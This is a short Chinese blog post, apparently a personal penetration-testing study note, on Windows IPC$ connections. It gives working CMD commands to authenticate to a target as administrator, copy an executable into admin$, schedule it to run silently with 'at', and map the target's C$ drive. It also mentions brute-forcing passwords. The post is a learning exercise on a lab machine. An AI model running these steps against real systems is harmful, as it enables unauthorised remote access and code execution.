前言
最近在看一些滲透測試的教程。打算把一些東西實踐實踐,加深一下印象!
今天就來看看IPC連接。雖然很老,但是很經典。
正文
什么是IPC?
IPC(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
IPC$ (Internet Process Connection)國人叫他共享"命名管道"資源服務。
其實看原始英文名稱我們能更好的理解他的用途和作用。
IPC$就是為“進程”間建立網絡連接而存在的服務
說的再明確點就是:IPC$是一個為“各類進程”建立網絡通信連接而存在的服務
ipc利用
1.windows server 2003 與 windows xp ipc連接無需密碼即可建立連接
2.暴力破解windows 密碼,執行遠程主機命令,獲取主機權限
一、建立IPC連接
在CMD下輸入以下命令:
net use \\192.168.0.100\ipc$ "password" /user:"administrator"
二、通過IPC傳文件
在CMD下輸入以下命令:
假如我要傳的文件是putty.exe,admin$表示C:\WINDOWS\目錄
copy putty.exe \\192.168.0.100\admin$
三、通過IPC查看對方電腦時間
在CMD下輸入以下命令:
net time \\192.168.0.100
四、定時運行程序
在CMD下輸入以下命令:
at \\192.168.0.100 19:45 putty.exe
五、確認是否啟動
居然還是靜默運行的。只能在任務管理器中看到的。
六、將靶機C盤文件映射到本地
在CMD下輸入以下命令:
net use Z: \\192.168.0.100\c$
七、斷開IPC連接
在CMD下輸入以下命令:
net use \\192.168.0.100 /del
————————————————
版權聲明:本文為CSDN博主「看不盡的塵埃」的原創文章,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/weixin_42936566/article/details/86555918